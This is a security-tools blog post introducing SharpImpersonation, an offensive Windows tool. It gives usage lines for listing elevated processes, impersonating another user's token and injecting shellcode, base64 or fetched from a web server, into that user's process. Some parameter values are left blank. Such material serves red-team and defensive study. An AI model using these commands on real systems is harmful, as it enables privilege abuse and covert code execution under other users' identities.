SharpImpersonation : A User Impersonation Tool – Via Token Or Shellcode Injection

SharpImpersonation is a User Impersonation Tool – Via Token Or Shellcode Injection. This was a learning by doing project from my side. Well known techniques are used to built just another impersonation tool with some improvements in comparison to other public tools. The code base was taken from:

https://github.com/0xbadjuju/Tokenvator

A blog post for the intruduction can be found here:

https://s3cur3th1ssh1t.github.io/SharpImpersonation-Introduction/

List user processes

List only elevated processes

PS > PS C:\temp> SharpImpersonation.exe list elevated

Impersonate the first process of the target user to start a new binary

PS > PS C:\temp> SharpImpersonation.exe user: binary:

Inject base64 encoded shellcode into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user: shellcode:

Inject shellcode loaded from a webserver into the first process of the target user

PS > PS C:\temp> SharpImpersonation.exe user: shellcode:

Impersonate the target user via ImpersonateLoggedOnuser for the current session

PS > PS C:\temp> SharpImpersonation.exe user: technique:ImpersonateLoggedOnuser

Related

SharpNamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation

September 29, 2022

In "Kali Linux"

NamedPipePTH : Pass The Hash To A Named Pipe For Token Impersonation

June 29, 2021

In "Kali Linux"

Mshikaki – Advanced Shellcode Injection Tool for Bypassing AMSI

September 28, 2023

In "Exploitation Tools"

R K

Next kics : Find security vulnerabilities, compliance issues, and infrastructure misconfigurations »

Previous « SDomDiscover : A Easy-To-Use Python Tool To Perform DNS Recon

Leave a Comment

Share

Published by

R K

Tags: SharpImpersonationshellcode injection

4 years ago

Recent Posts

Android Security

This Android Bug Can Crack Your Lock Screen in 60 Seconds

A newly disclosed Android vulnerability is making noise for a good reason. Researchers showed that…

3 days ago

Database Assessment

How to Fix MyISAM Table Corruption in MySQL?

In MySQL Server 5.5 and earlier versions, the MyISAM was the default storage engine. So,…

4 days ago

Vulnerability Analysis

Microsoft Authenticator Flaw Could Leak Login Codes

A newly disclosed vulnerability in Microsoft Authenticator could expose one time sign in codes or…

4 days ago

software

Modrinth – A Comprehensive Overview of Tools and Functions

Modrinth is a modern platform that’s rapidly changing the landscape of Minecraft modding, providing an…

5 days ago

News

BlackSanta Malware A Stealthy Threat Targeting Recruiters and HR Teams

A new, highly sophisticated malware campaign named BlackSanta has emerged, primarily targeting HR and recruitment…

5 days ago

TECH

Perplexity Launches Personal Computer Features

Perplexity has unveiled an exciting new feature, Personal Computer, which allows AI agents to seamlessly…

5 days ago

L